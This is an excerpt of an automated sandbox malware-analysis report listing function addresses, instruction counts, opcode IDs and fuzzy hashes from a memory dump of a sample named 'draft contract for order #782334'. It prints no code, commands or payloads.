                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: be03cf9397151ec9a24f0c186e7e9d9892a7b5dbd0f63fbd49075e437b7ab5d8
                                                                                                                        • Instruction ID: a5e4007127f5d78264ed5d88bc312fa93305c11660183544246550d144a91eae
                                                                                                                        • Opcode Fuzzy Hash: be03cf9397151ec9a24f0c186e7e9d9892a7b5dbd0f63fbd49075e437b7ab5d8
                                                                                                                        • Instruction Fuzzy Hash: 3F51B072504712AFD722EE68C888F9BFBE8EBC5750F010929BA41DB254D774ED05C7A2
                                                                                                                        Function 017A8350 Relevance: .2, Instructions: 161COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a78ee39bb4521c77f460e72a6a0398f3b94781f4cb165ecbebf19df5e4d35ff5
                                                                                                                        • Instruction ID: f55a6b2ece97e0c5e702a7677af9c9b68bf640020e86cfd6cea01798277412f7
                                                                                                                        • Opcode Fuzzy Hash: a78ee39bb4521c77f460e72a6a0398f3b94781f4cb165ecbebf19df5e4d35ff5
                                                                                                                        • Instruction Fuzzy Hash: 8851DF70900705DFD721CFAAC884AABFBF8BF94710F50471EE292976A1D7B0A545CB91
                                                                                                                        Function 0173E443 Relevance: .2, Instructions: 158COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 78dfb68efb2a7047b9b2c599779d4c29d823840b71607a67d40059aec9b06e99
                                                                                                                        • Instruction ID: f3e8e62940a83250cb001971d7d65735ecdac0d0d02cdd1b8e9a6c4c22780ba4
                                                                                                                        • Opcode Fuzzy Hash: 78dfb68efb2a7047b9b2c599779d4c29d823840b71607a67d40059aec9b06e99
                                                                                                                        • Instruction Fuzzy Hash: 78518E71200A05DFCB22EF69C984E6AF3F9FF58764F500869E652972A5EB30ED50CB50
                                                                                                                        Function 017A4180 Relevance: .2, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e5c09b469f35cb1a9773b04c32f0ad579ffd200bd5564657117c4f1ee0166fa1
                                                                                                                        • Instruction ID: 5e3c645021e5f4a388a7f6ba93a7538779f0becc4c385aa720ba93a3ea6c144e
                                                                                                                        • Opcode Fuzzy Hash: e5c09b469f35cb1a9773b04c32f0ad579ffd200bd5564657117c4f1ee0166fa1
                                                                                                                        • Instruction Fuzzy Hash: 715178716083429FD754DF29C880A6BFBE5BFC8204F884A2DF58AD7250EB71D905CB52
                                                                                                                        Function 017245B1 Relevance: .2, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                        • Instruction ID: 15d9036c8e9e1283e41b0ac916d65212cfdb873b8b9646d4d0eab5d018269d02
                                                                                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                                        • Instruction Fuzzy Hash: F0518E71E0022AABDF15DF98C444BEEFBB9AF45754F044069EA12AB340D774DE46CBA0
                                                                                                                        Function 0178E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                        • Instruction ID: c2da005217fa9d870a930ee6ab29c444a61e2cb4ff2c81ca40208f19ca2db028
                                                                                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                        • Instruction Fuzzy Hash: 9A51A571D4021AEFEF21BA94C894FAEFFB5AB00724F154665E912A7190DB309E408BA1
                                                                                                                        Function 017C8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fd74dbe4085ad589ca66ca1e99db9ec6e7edd4b482a8e1533fc45d2607ffbfed
                                                                                                                        • Instruction ID: d6d5284e08e388793c2ae7d78ff5cc0ff3b8fbf5ceeabe8def892b165331099f
                                                                                                                        • Opcode Fuzzy Hash: fd74dbe4085ad589ca66ca1e99db9ec6e7edd4b482a8e1533fc45d2607ffbfed
                                                                                                                        • Instruction Fuzzy Hash: 2541D3707016119BDB29DF2DC894B7BFB9AEF90B20F08826DE95587385DB34D841C792
                                                                                                                        Function 0178CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1bcae392893c6744df3367b4419753cda141617796c9a980009e10a40c472c20
                                                                                                                        • Instruction ID: 1ea5c0bada9107cbc744137770fe2095acf14d0861999b8fce1355d42b4492aa
                                                                                                                        • Opcode Fuzzy Hash: 1bcae392893c6744df3367b4419753cda141617796c9a980009e10a40c472c20
                                                                                                                        • Instruction Fuzzy Hash: 67517D71940216DFCB21EFA9C98499EFBF9FB48364B118559E545A3305D730AD41CFA0
                                                                                                                        Function 017CA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                        • Instruction ID: 3d69f916b2ffd5a001b700e8a8ab1e44070176bb927c35d2d8c4f79d81335abc
                                                                                                                        • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                        • Instruction Fuzzy Hash: C241E471A0171A9FCB25CF2CC984A6EF7A9FF80711B04466EEA1287644FB30EE04C790
                                                                                                                        Function 017301F8 Relevance: .1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cff1fafbb2b6262fc7c608b722e0fdcaa2a20797f5edb5d7e162de4d44b416ac
                                                                                                                        • Instruction ID: 592fc6a2806f31590202d160ad7505dee31c213440b6bfbefda281c554f239aa
                                                                                                                        • Opcode Fuzzy Hash: cff1fafbb2b6262fc7c608b722e0fdcaa2a20797f5edb5d7e162de4d44b416ac
                                                                                                                        • Instruction Fuzzy Hash: B341BC76900219DBDB14DF98C440AEEFBB5BF88710F15816EF815E7242D7359D41CBA4
                                                                                                                        Function 0172EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2cb4df9de518a554208e65ae46f50680bc87d8d798fa9db6b5e04f3c41ef9879
                                                                                                                        • Instruction ID: 42eab67ea0241ea663dab15fdcd66db2e2ad1f72fbce5d19c1fadb7932859f89
                                                                                                                        • Opcode Fuzzy Hash: 2cb4df9de518a554208e65ae46f50680bc87d8d798fa9db6b5e04f3c41ef9879
                                                                                                                        • Instruction Fuzzy Hash: BD41E0712043029FD724DF68C894A6BF7F9FF98224F10486EE957C721AEB30E8858B51
                                                                                                                        Function 01742750 Relevance: .1, Instructions: 137COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                        • Instruction ID: b16a27edc2de45e5849bc1542899308315e3fded781d949c14cd95511e00f570
                                                                                                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                        • Instruction Fuzzy Hash: 9E515B75A00219DFEB15CF9CC480AAEF7B2FF84710F2881A9D915A7355D771AE82CB90
                                                                                                                        Function 01706154 Relevance: .1, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 304aaad47853366c808ab8b0091f952d5fd939299fbf6f050b488d1ca23c9880
                                                                                                                        • Instruction ID: 2f4f48c969f7da1a85577c645d8b94351aea3deb2477f40ada7d023a2d5a154b
                                                                                                                        • Opcode Fuzzy Hash: 304aaad47853366c808ab8b0091f952d5fd939299fbf6f050b488d1ca23c9880
                                                                                                                        • Instruction Fuzzy Hash: A9510770944207DBDB269B28CC14BE9FBF5EF15314F1482A9F515A72C6D7349991CF40
                                                                                                                        Function 01700BCD Relevance: .1, Instructions: 130COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b669442cab7b3c4ced815726c914ea6829e2dd5980536c27e36a935212f710a9
                                                                                                                        • Instruction ID: 5620a4775f7f90f4d69c3c85987f42a0d148247d80775bd1c3499b5458a28416
                                                                                                                        • Opcode Fuzzy Hash: b669442cab7b3c4ced815726c914ea6829e2dd5980536c27e36a935212f710a9
                                                                                                                        • Instruction Fuzzy Hash: 5A418135A00329DBDB62DF6CC944BEEF7B4EF45750F0100A5E909AB285DB749E84CB91
                                                                                                                        Function 017C866E Relevance: .1, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                        • Instruction ID: 91a919ff98ec1fe4ea28c9ea15694e488174c5ed2179689065058b64215f3de2
                                                                                                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                        • Instruction Fuzzy Hash: 0A418275B10205ABEB15DF99CC84AAFFBBAAF88B10F14406DE905A7346DB70DD0187A1
                                                                                                                        Function 01700887 Relevance: .1, Instructions: 128COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2c9ff779b95b162d596395160e79409c4712d32473fee93b871e31b31a695463
                                                                                                                        • Instruction ID: e265ebd012e02c10802f4760ab1c6e04e5313c8c16d61068b9de681e617e0be1
                                                                                                                        • Opcode Fuzzy Hash: 2c9ff779b95b162d596395160e79409c4712d32473fee93b871e31b31a695463
                                                                                                                        • Instruction Fuzzy Hash: F741B0B0610701DFE326CF28C480A22F7F9FF49364B208A6EE54786A91E730E945CB90
                                                                                                                        Function 0172A470 Relevance: .1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b3b1e391406678e44e46eb85d650f85d45fe7a10628ccc28712a0609187fd565
                                                                                                                        • Instruction ID: 22a69de63cf084b10996ad514bb086b646eb2ca9d919438d93ef7dcb721e2be2
                                                                                                                        • Opcode Fuzzy Hash: b3b1e391406678e44e46eb85d650f85d45fe7a10628ccc28712a0609187fd565
                                                                                                                        • Instruction Fuzzy Hash: 8141E131944225CFDB25DF6CC894BAFFBB4FB18320F284199D412AB699DB34D941CBA0
                                                                                                                        Function 01708BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cc8a448e30f732d6d821ce4b23eddc86695c8a61fc96c0e99830fdeeffa67007
                                                                                                                        • Instruction ID: 7f13eeb1e3c99444224a2fa5f83528c8beafeffe246538c23cdb3bc658565840
                                                                                                                        • Opcode Fuzzy Hash: cc8a448e30f732d6d821ce4b23eddc86695c8a61fc96c0e99830fdeeffa67007
                                                                                                                        • Instruction Fuzzy Hash: 28411371E00302CBD7269F58C884A6BFBF5FB98714F18816ED9069B29AC775D842CF91
                                                                                                                        Function 016F8918 Relevance: .1, Instructions: 123COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 63e0d673d0ba635a7fbab8524d19a38297a243c02c344d933b70171899839f2e
                                                                                                                        • Instruction ID: 60abe40a9f2e88300a9c7cc2d86cd03f0d908ee7709cf7bf30d3189a065c6198
                                                                                                                        • Opcode Fuzzy Hash: 63e0d673d0ba635a7fbab8524d19a38297a243c02c344d933b70171899839f2e
                                                                                                                        • Instruction Fuzzy Hash: 9D4148315083569ED312DF69C840A6BF7E9EF88B54F40096EFA94D7250E770DE058BA3
                                                                                                                        Function 016FA020 Relevance: .1, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                        • Instruction ID: 54129f60a41e852bbda44821b036c2cdccc95cce803d2a840ace0630cafec71e
                                                                                                                        • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                        • Instruction Fuzzy Hash: 82413B31A00211EBDB51DEA898407BAFB73EB50759F15806EEE498B280D7768D41CB90
                                                                                                                        Function 017009AD Relevance: .1, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c4c796fc33549d8a875d490f81ffbfca8cceb85695ed0f3f2fccb57d5dad4dd
                                                                                                                        • Instruction ID: 5152e729e93c0fcea7f4ce654d6b3fa2fe17ebaf1ecf8ecf86ba1b026262a3ff
                                                                                                                        • Opcode Fuzzy Hash: 5c4c796fc33549d8a875d490f81ffbfca8cceb85695ed0f3f2fccb57d5dad4dd
                                                                                                                        • Instruction Fuzzy Hash: BC415AB1640701EFD722CF18C844B26FBE5FF58364F24866AE4498B291E771EA41CB90
                                                                                                                        Function 01730710 Relevance: .1, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                        • Instruction ID: f4522b704db7af58f511133d8ad503ba2a1cf65585b23bc192468f7ac032465e
                                                                                                                        • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                        • Instruction Fuzzy Hash: 5E410875A00605EFDB25CF98C980AAAFBF4FF58704B10496DE656D7652D330EA44CF90
                                                                                                                        Function 0170262C Relevance: .1, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ecb7a6e504b798e8137665428c36c57f92f7884d5552924955895cccc628afed
                                                                                                                        • Instruction ID: 60f22c6ef5e23498fec39b0927e95c9ea72d6896849194224703a1213ecd7bff
                                                                                                                        • Opcode Fuzzy Hash: ecb7a6e504b798e8137665428c36c57f92f7884d5552924955895cccc628afed
                                                                                                                        • Instruction Fuzzy Hash: 7441B0B2541705DFC722EF28C908665F7F1FF58320F1081ADD6069B6E6DB30A941CB51
                                                                                                                        Function 0173C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da1f94e8799ed9d49e905c0a2a7f40a0430a3282423b300ec0ec0ef628e245ce
                                                                                                                        • Instruction ID: 6621d2dfbe5a290b8fec52d298ea3a63c9ffb366a263b5bfc5830400a797aa42
                                                                                                                        • Opcode Fuzzy Hash: da1f94e8799ed9d49e905c0a2a7f40a0430a3282423b300ec0ec0ef628e245ce
                                                                                                                        • Instruction Fuzzy Hash: 213177B2A00349DFDB12CFA8C440799FBF0EB49724F2181AED519EB252D3729902CB90
                                                                                                                        Function 017807C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 02809f48ff5c5e56416546f128f9c71117dc70fe9f854c359580159fe4a2f594
                                                                                                                        • Instruction ID: b6969ebc66c7d3bb614e21034531750e05cb7a3612777405685a2112d0e8a926
                                                                                                                        • Opcode Fuzzy Hash: 02809f48ff5c5e56416546f128f9c71117dc70fe9f854c359580159fe4a2f594
                                                                                                                        • Instruction Fuzzy Hash: 5A419E715583019FD320EF29C845B9BFBE8FF88624F008A2EF998D7251D7709944CB92
                                                                                                                        Function 016F80A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aa523ebbe99e48b976d23d8807100d0404387bcffcab308cf61392271d3b5daa
                                                                                                                        • Instruction ID: ba8a9c630f9d0d5398ac161bd90bd31845c9b1e40d3aeb858d84804c1b3e792d
                                                                                                                        • Opcode Fuzzy Hash: aa523ebbe99e48b976d23d8807100d0404387bcffcab308cf61392271d3b5daa
                                                                                                                        • Instruction Fuzzy Hash: 8A41D071A05617EFDB01DF18CC806A8F7B9BB44761F2083ADDA15A7380DB34ED428B90
                                                                                                                        Function 017805A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dbe91c31ad5c208af229998b7e1838babbac8871100f66966e59a1d49cbbdf10
                                                                                                                        • Instruction ID: cc23b8f9b23250c1ac2af33eafdd69ac7ac337564e82482606a695a387d3ec2f
                                                                                                                        • Opcode Fuzzy Hash: dbe91c31ad5c208af229998b7e1838babbac8871100f66966e59a1d49cbbdf10
                                                                                                                        • Instruction Fuzzy Hash: 1E41D0726446429FD320EF6CC840A7AF7E9FFC8700F140A29F99487680E730E918C7A6
                                                                                                                        Function 01704859 Relevance: .1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b2ca70540f4704f9b58942d0e5a28a36c2727c5aed78fbce40d0212f9af793f8
                                                                                                                        • Instruction ID: 5624b5253ed06127d328fcd403a53fd289ff00429f95c1a506522ca08880ecd1
                                                                                                                        • Opcode Fuzzy Hash: b2ca70540f4704f9b58942d0e5a28a36c2727c5aed78fbce40d0212f9af793f8
                                                                                                                        • Instruction Fuzzy Hash: C241AE70210302CBD726DF2CD888B2AFBE9AF80364F14487DEA568B2E5DB30D901CB51
                                                                                                                        Function 016F8B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b583d283c2476cb9ea3d2d2ea7a653ff1cc0a3ba9b2f695b003d62484d98fba2
                                                                                                                        • Instruction ID: 5bff359f2b9fe6454adca96e0014ae26b2e6b150ccc4187ebc356bfe48892e94
                                                                                                                        • Opcode Fuzzy Hash: b583d283c2476cb9ea3d2d2ea7a653ff1cc0a3ba9b2f695b003d62484d98fba2
